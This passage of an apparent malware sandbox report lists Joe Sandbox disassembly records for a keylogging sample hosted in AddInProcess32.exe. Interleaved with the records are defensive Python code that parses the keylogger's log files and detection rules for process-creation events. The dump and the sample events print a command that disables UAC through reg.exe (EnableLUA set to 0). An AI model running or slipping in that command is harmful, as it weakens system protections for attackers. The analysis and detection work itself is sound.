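    for m in HEADER_RE.finditer(text):
        try:
            stamp = datetime(*(int(g) for g in m.groups()[:6]))
        except ValueError:
            continue
        heads.append((m, stamp))
    sessions = []
    for i, (m, stamp) in enumerate(heads):
        end = heads[i + 1][0].start() if i + 1 < len(heads) else len(text)
        body = text[m.end():end].strip("\r\n")
        sessions.append(Session(stamp, m.group(7), body))
    return sessions


def parse_log_bytes(data: bytes) -> List[Session]:
    return parse_sessions(decode_log(data))


# Constructed sample: two sessions plus one corrupted header line.
SAMPLE_LOG = (
    "[2024/07/26 09:15:02 Offline Keylogger Started]\r\n"
    "hello world\r\n"
    "[2024/07/26 09:20:45 Offline Keylogger Started]\r\n"
    "password123\r\n"
    "[2024/13/40 99:99:99 Offline Keylogger Started]\r\n"
)

if __name__ == "__main__":
    for s in parse_log_bytes(SAMPLE_LOG.encode("utf-16-le")):
        print(s.started.isoformat(), s.label, repr(s.text))
```

The parser runs the same way on an 8-bit, a BOM-prefixed, or a bare UTF-16LE file, which is what you want when the on-disk encoding of the dropped log is not yet known.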
                  APIs
                  • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6AB
                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                  • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                  • CloseHandle.KERNEL32(00000000), ref: 0040A6EE
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateHandleSizeSleep
                  • String ID: XQG
                  • API String ID: 1958988193-3606453820
                  • Opcode ID: 38e21002b9c7a7665831af374e9118a36682828a780468fd2ba8ddd7b6ab83cd
                  • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                  • Opcode Fuzzy Hash: 38e21002b9c7a7665831af374e9118a36682828a780468fd2ba8ddd7b6ab83cd
                  • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ClassCreateErrorLastRegisterWindow
                  • String ID: 0$MsgWindowClass
                  • API String ID: 2877667751-2410386613
                  • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                  • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                  • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                  • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                  APIs
                  • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                  • CloseHandle.KERNEL32(?), ref: 004077AA
                  • CloseHandle.KERNEL32(?), ref: 004077AF
                  Strings
                  • C:\Windows\System32\cmd.exe, xrefs: 00407796
                  • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandle$CreateProcess
                  • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                  • API String ID: 2922976086-4183131282
                  • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                  • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                  • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                  • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
                  Strings
                  • SG, xrefs: 004076DA
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, xrefs: 004076C4
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                  • API String ID: 0-1732489412
                  • Opcode ID: aeb7ec08203138e6f15c389ffc7d883b5859742f8fda7ba0964a05b6f7ae7d1f
                  • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                  • Opcode Fuzzy Hash: aeb7ec08203138e6f15c389ffc7d883b5859742f8fda7ba0964a05b6f7ae7d1f
                  • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
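The two records above give the defender two concrete strings: the CreateProcessA call that runs reg.exe to set EnableLUA to 0 under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System (disabling UAC prompts), and the path of the .NET add-in host AddInProcess32.exe in which the dump itself was taken. Note that the payload passes cmd.exe as lpApplicationName and only "/k ..." as lpCommandLine, so a process-creation log may record a command line that starts with "/k" and never mentions cmd.exe. The following is an added example, not code from this report, of detection logic over process-creation events for those behaviours. The event records are constructed; the trusted-parent list and the assumption that a genuine add-in activation carries /guid: and /pid: switches are assumptions to tune per environment.

```python
"""Process-creation detections for two behaviours visible in the dump: UAC
disabled by writing EnableLUA = 0 through reg.exe, and AddInProcess32.exe
used as a host for injected code. Added example, not code from the report;
SAMPLE_EVENTS are constructed and the add-in host assumptions are labelled."""
import re
from dataclasses import dataclass
from typing import Callable, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 / Security 4688 fields)."""
    image: str
    parent_image: str
    command_line: str


# Matches the reg.exe command embedded in the payload (xref 00407791),
# tolerating case, an unexpanded %windir%, quoting, and "0x0" for the value.
ENABLELUA_RE = re.compile(
    r'reg(?:\.exe)?"?\s+add\s+.*policies\\system\b.*?/v\s+enablelua\b.*?/d\s+(?:0x)?0+\b',
    re.IGNORECASE,
)

ADDIN_HOST = "addinprocess32.exe"
# Parents that legitimately start the add-in host (assumption; tune per estate).
TRUSTED_ADDIN_PARENTS = {"devenv.exe"}
# A real System.AddIn activation passes /guid: and /pid: switches (assumption).
ADDIN_ARGS_RE = re.compile(r"/guid:\S+.*?/pid:\d+", re.IGNORECASE)
SHELLS = {"cmd.exe", "powershell.exe", "reg.exe"}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def enablelua_tamper(ev: ProcEvent) -> bool:
    """UAC disabled by policy edit; works on a bare "/k ..." command line."""
    return bool(ENABLELUA_RE.search(ev.command_line))


def addin_host_abuse(ev: ProcEvent) -> bool:
    """AddInProcess32.exe started by an untrusted parent or without the
    switches a genuine activation would pass."""
    if _basename(ev.image) != ADDIN_HOST:
        return False
    trusted = _basename(ev.parent_image) in TRUSTED_ADDIN_PARENTS
    return not (trusted and ADDIN_ARGS_RE.search(ev.command_line))


def shell_from_addin_host(ev: ProcEvent) -> bool:
    """The add-in host has no reason to spawn an interpreter or reg.exe."""
    return _basename(ev.parent_image) == ADDIN_HOST and _basename(ev.image) in SHELLS


RULES: List[Tuple[str, Callable[[ProcEvent], bool]]] = [
    ("uac_enablelua_disabled", enablelua_tamper),
    ("addin_host_abuse", addin_host_abuse),
    ("shell_from_addin_host", shell_from_addin_host),
]


def triage(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for every rule that fires."""
    return [(i, name) for i, ev in enumerate(events) for name, rule in RULES if rule(ev)]


NET = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
SAMPLE_EVENTS = [
    # 0: what the payload's CreateProcessA call would log (strings from the dump)
    ProcEvent(r"C:\Windows\System32\cmd.exe", NET,
              r"/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"),
    # 1: add-in host launched from PowerShell with no activation switches
    ProcEvent(NET, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", NET),
    # 2: plausible legitimate activation by a trusted parent (constructed)
    ProcEvent(NET, r"C:\Program Files\Microsoft Visual Studio\Common7\IDE\devenv.exe",
              f'"{NET}" /guid:3e2c7c41-1c5a-4b1e-9a1d-2b4f5f6a7b8c /pid:4120'),
    # 3: an admin re-enabling UAC: same key, value 1, must not fire
    ProcEvent(r"C:\Windows\System32\reg.exe", r"C:\Windows\System32\cmd.exe",
              r"reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f"),
    # 4: hex spelling of zero and a quoted key, which reg.exe also accepts
    ProcEvent(r"C:\Windows\System32\reg.exe", r"C:\Windows\System32\cmd.exe",
              r'reg.exe add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0x0 /f'),
]

if __name__ == "__main__":
    for idx, name in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {name}")
```

Event 0 fires twice (the UAC edit and a shell spawned from the add-in host), which is the pairing to prioritise; the EnableLUA check alone also catches a re-run from any other parent, while the "/d 1" record stays silent.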
                  APIs
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EF8), ref: 00405120
                  • SetEvent.KERNEL32(?), ref: 0040512C
                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405137
                  • CloseHandle.KERNEL32(?), ref: 00405140
                    • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                  • String ID: KeepAlive | Disabled
                  • API String ID: 2993684571-305739064
                  • Opcode ID: 09248d073b904291628f2a82f92fe6a987867c86155402bef043dd91105bf09b
                  • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                  • Opcode Fuzzy Hash: 09248d073b904291628f2a82f92fe6a987867c86155402bef043dd91105bf09b
                  • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                  APIs
                    • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                  • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
                  • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
                  • Sleep.KERNEL32(00002710), ref: 0041AE07
                  • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: PlaySound$HandleLocalModuleSleepTime
                  • String ID: Alarm triggered
                  • API String ID: 614609389-2816303416
                  • Opcode ID: b7b395eb2d8a8c6ac5b29d0703eec326aa80e776d4c85912c0c2915f52647228
                  • Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
                  • Opcode Fuzzy Hash: b7b395eb2d8a8c6ac5b29d0703eec326aa80e776d4c85912c0c2915f52647228
                  • Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
                  APIs
                  • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
                  • GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CD6F
                  • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CD7C
                  • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CD8F
                  Strings
                  • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Console$AttributeText$BufferHandleInfoScreen
                  • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                  • API String ID: 3024135584-2418719853
                  • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                  • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
                  • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                  • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
                  • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                  • Opcode Fuzzy Hash: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
                  • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                  APIs
                    • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                  • _free.LIBCMT ref: 00444E06
                  • _free.LIBCMT ref: 00444E1D
                  • _free.LIBCMT ref: 00444E3C
                  • _free.LIBCMT ref: 00444E57
                  • _free.LIBCMT ref: 00444E6E
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: _free$AllocateHeap
                  • String ID:
                  • API String ID: 3033488037-0
                  • Opcode ID: bf8b46b868af2ecf30d3444370171b65bdd51122b8350dbbe1b9982e260663b5
                  • Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
                  • Opcode Fuzzy Hash: bf8b46b868af2ecf30d3444370171b65bdd51122b8350dbbe1b9982e260663b5
                  • Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
                  APIs
                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                  • _free.LIBCMT ref: 004493BD
                    • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                    • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                  • _free.LIBCMT ref: 00449589
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                  • String ID:
                  • API String ID: 1286116820-0
                  • Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                  • Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
                  • Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                  • Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58
                  APIs
                    • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                  • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                  • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                    • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                    • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                    • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                  • String ID:
                  • API String ID: 4269425633-0
                  • Opcode ID: 371d05c907dcca9c3c12ab80cf798e7523ffd5e5ecf3e3ca40c8afe2c02f4cbd
                  • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                  • Opcode Fuzzy Hash: 371d05c907dcca9c3c12ab80cf798e7523ffd5e5ecf3e3ca40c8afe2c02f4cbd
                  • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
                  APIs
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: _free
                  • String ID:
                  • API String ID: 269201875-0
                  • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                  • Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
                  • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                  • Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
                  APIs
                  • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                    • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                  • _free.LIBCMT ref: 0044F3BF
                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                  • String ID:
                  • API String ID: 336800556-0
                  • Opcode ID: 02a97bdb6e6c5d26fe886d3a9ae646317caea956d8251916105bf2d3fe3a3540
                  • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                  • Opcode Fuzzy Hash: 02a97bdb6e6c5d26fe886d3a9ae646317caea956d8251916105bf2d3fe3a3540
                  • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                  APIs
                  • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C44D
                  • CloseHandle.KERNEL32(00000000), ref: 0041C459
                  • WriteFile.KERNEL32(00000000,00000000,00000000,00406F85,00000000), ref: 0041C46A
                  • CloseHandle.KERNEL32(00000000), ref: 0041C477
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseHandle$CreatePointerWrite
                  • String ID:
                  • API String ID: 1852769593-0
                  • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                  • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                  • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                  • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
                  APIs
                  • GetLastError.KERNEL32(?,00000000,?,0043BC87,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0044829E
                  • _free.LIBCMT ref: 004482D3
                  • _free.LIBCMT ref: 004482FA
                  • SetLastError.KERNEL32(00000000), ref: 00448307
                  • SetLastError.KERNEL32(00000000), ref: 00448310
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorLast$_free
                  • String ID:
                  • API String ID: 3170660625-0
                  • Opcode ID: ce9cc6301b23d983ade5427f2db299c0b586cbcb428296df669d0de5b5bf801f
                  • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
                  • Opcode Fuzzy Hash: ce9cc6301b23d983ade5427f2db299c0b586cbcb428296df669d0de5b5bf801f
                  • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
                  APIs
                  • _free.LIBCMT ref: 004509D4
                    • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                    • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                  • _free.LIBCMT ref: 004509E6
                  • _free.LIBCMT ref: 004509F8
                  • _free.LIBCMT ref: 00450A0A
                  • _free.LIBCMT ref: 00450A1C
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                  • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
                  • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                  • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
                  APIs
                  • _free.LIBCMT ref: 00444066
                    • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                    • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                  • _free.LIBCMT ref: 00444078
                  • _free.LIBCMT ref: 0044408B
                  • _free.LIBCMT ref: 0044409C
                  • _free.LIBCMT ref: 004440AD
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                  • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
                  • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                  • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: PkGNG
                  • API String ID: 0-263838557
                  • Opcode ID: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
                  • Instruction ID: 56b21f6c39f874414c878b072b89285690216c2d241c0ad811085e1835033e53
                  • Opcode Fuzzy Hash: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
                  • Instruction Fuzzy Hash: 1B51B271D00249AAEF14DFA9C885FAFBBB8EF45314F14015FE400A7291DB78D901CBA9
                  APIs
                  • _strpbrk.LIBCMT ref: 0044E738
                  • _free.LIBCMT ref: 0044E855
                    • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD1B
                    • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417), ref: 0043BD3D
                    • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000), ref: 0043BD44
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                  • String ID: *?$.
                  • API String ID: 2812119850-3972193922
                  • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                  • Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
                  • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                  • Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54
                  APIs
                  Strings
                  Memory Dump Source
